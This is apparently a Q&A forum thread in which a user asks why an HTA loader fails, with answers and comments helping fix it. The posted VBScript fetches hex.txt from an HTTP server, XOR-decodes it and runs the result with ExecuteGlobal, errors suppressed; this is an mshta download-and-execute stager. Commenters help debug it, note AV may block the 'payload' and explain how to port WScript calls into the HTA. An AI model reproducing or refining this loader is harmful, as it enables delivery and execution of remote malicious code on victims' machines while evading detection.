1

I have a vbscript which works fine when executed stand alone i.e.

On Error Resume Next:
            Set a=CreateObject("MSXML2.ServerXMLHTTP.6.0"):
            a.setOption 2,13056:
            while(Len(b) = 0):
                a.open"GET","http://127.0.0.1/hex.txt",False:
                a.send: 
                b = a.responseText:
            wend:
            k="password":
            for i = 0 to Len(b) - 1 Step 2:
                c = c & Chr(Asc(Chr("&H" & Mid(b, i + 1, 2))) xor Asc(Mid(k, ((i / 2)mod Len(k)) + 1, 1))):
        
            Next:
            ExecuteGlobal c:

But when i include this script inside HTA, It doesn't execute the (ExecuteGlobal c:) i.e.

<html>
<head>
<script language="VBScript"> 
    Sub RunProgram
            On Error Resume Next:
            Set a=CreateObject("MSXML2.ServerXMLHTTP.6.0"):
            a.setOption 2,13056:
            while(Len(b) = 0):
                a.open"GET","http://127.0.0.1/hex.txt",False:
                a.send: 
                b = a.responseText:
            wend:
            k="password":
            for i = 0 to Len(b) - 1 Step 2:
                c = c & Chr(Asc(Chr("&H" & Mid(b, i + 1, 2))) xor Asc(Mid(k, ((i / 2)mod Len(k)) + 1, 1))):
        
            Next:
            ExecuteGlobal c:   
        End Sub
    RunProgram()
</script>
</head> 
<body>
 
</body>
</html>

I think the issue is with the (ExecuteGlobal c:) portion, it doesn't execute in HTA but it is executed fine when i use the vbscript alone.

user260854
  • 27
  • 5
  • Because that isn't a HTA so the won’t allow to use code like `ExecuteGlobal`. You need to include the [``](https://learn.microsoft.com/en-us/previous-versions/ms536495(v=vs.85)) element. – user692942 Jul 13 '21 at 06:17
  • 1
    why do you end each line with a `:` ? Seems weird to me. – Geert Bellekens Jul 13 '21 at 13:26

1 Answers1

0

Updated Answer:

Based on the comments it clear that the issue is in the decoded script you try to run making a reference to WScript which is an object not accessible outside of the Windows Scripting Host (wscript.exe and cscript.exe). It is not available from within an HTA as the MSHTA scripting host doesn't support it.

Original Answer:

The HTML code example at the moment is not an HTA as it is missing the <HTA:APPLICATION> element.

Try adding;

<HTA:APPLICATION ID="oHTA"
     APPLICATIONNAME="myApp"
     BORDER="thin"
     BORDERSTYLE="normal"
     CAPTION="yes"
     ICON=""
     MAXIMIZEBUTTON="yes"
     MINIMIZEBUTTON="yes"
     SHOWINTASKBAR="no"
     SINGLEINSTANCE="no"
     SYSMENU="yes"
     VERSION="1.0"
     WINDOWSTATE="maximize"/>

to the HTML inside the HEAD element.

user692942
  • 16,398
  • 7
  • 76
  • 175
  • Thanks for the reply, i have added the above lines but it didn't work. I think the HTA doesn't properly run (ExecuteGlobal c: ) because when i use the vbscript alone, it works fine but in HTA it doesn't – user260854 Jul 13 '21 at 06:41
  • @user260854 How are you running your HTA? It should be via `mshta.exe` and the file should have a `.hta` extension anything else like just opening it locally in the web browser will not work. I’ve added a link to the official documentation to get you started. – user692942 Jul 13 '21 at 06:52
  • I'm executing using mshta and it executes fine because i can see on my host system that hex.txt is fetched successfully but (ExecuteGlobal c) doesn't execute – user260854 Jul 13 '21 at 07:16
  • @user260854 are you running some AV software that could be reading the script as a false positive (assuming the script isn't malicious)? If you are using the script in the context of an HTA there is no reason why `ExecuteGlobal` shouldn't work, I've used it myself many times but have also encountered issues with 3rd party AV and MW programs blocking it from running. – user692942 Jul 13 '21 at 07:33
  • @user260854 Also, how do you know `ExecuteGlobal` doesn't execute? I would start by trying a simpler piece of code in `c` to test it like `c = "MsgBox ""test"""` and see if that executes, you should have a popup message with the word `test` appear. – user692942 Jul 13 '21 at 07:40
  • I'm running http server on my server side so when the hex file is fetched. i get notified on the server. But in ExecuteGlobal() i'm also fetching some files but the server didn't show notification related to those files therefore i though that the ExecuteGlobal() doesn't execute (properly i suppose) – user260854 Jul 13 '21 at 07:48
  • @user260854 in which case, I would try a simpler test to check `ExecuteGlobal` is not executing as I [suggested in the previous comment](https://stackoverflow.com/questions/68356597/usage-of-executeglobal-in-hta-file#comment120812153_68357452). It's more likely the overly complex hex decode is what is not doing what you expect. – user692942 Jul 13 '21 at 07:55
  • 1
    You are right as i've tried a simple MsgBox and it executed successfully. The confusion lies in the fact that the same decoding mechanism works fine when executed standalone as vbs script. I have executed this same vbs portion several times and it works fine without the HTA but when executed as a part of HTA, it create problem. – user260854 Jul 13 '21 at 09:47
  • @user260854 in which case it's not `ExecuteGlobal` that is the problem but likely some 3rd party app is flagging the payload you are trying to execute as malicious and blocking its execution. – user692942 Jul 13 '21 at 09:51
  • 1
    @user260854 You could comment out the `On Error Resume Next` temporarily and see if the code is throwing any errors. – Flakes Jul 13 '21 at 11:00
  • Also, you might need to play with the `iexplore.exe` security settings in the Internet Options dialogue as this is what MSHTA uses when restricting access to ActiveX controls etc. – user692942 Jul 13 '21 at 11:03
  • 1
    @Flakes : I had commented out (On Error Resume Next) and got this error "Object required: 'Wscript' – user260854 Jul 13 '21 at 11:26
  • 1
    @user260854 The `hex.txt` decode contains a script that uses `WScript` but that object [isn't native to VBScript](https://stackoverflow.com/a/40484681/692942) it's part of the scripting host used by VBScript. That explains why it works when you run VBScript via the `cscript/wscript` scripting host. – user692942 Jul 13 '21 at 12:21
  • Yes, thats right. I'm using wscript in the following so i would need their alternative for HTA. 1) Wscript.Stdout 2) WScript.CreateObject( ) 3) WScript.Sleep – user260854 Jul 13 '21 at 12:34
  • @user260854 well `CreateObject()` is built into VBScript anyway so just drop the `WScript.`. As for `Sleep` this is covered with [another answer](https://stackoverflow.com/a/13099520/692942). The weird one is `StdOut` because it's part of the `WScript.Shell` by calling the `Exec()` method, so that should be fine only references directly to `WScript` will cause issues. – user692942 Jul 13 '21 at 13:18
  • 1
    Thank you, i think I have to create another thread for solving the Wscript.Stdout issue. – user260854 Jul 14 '21 at 04:09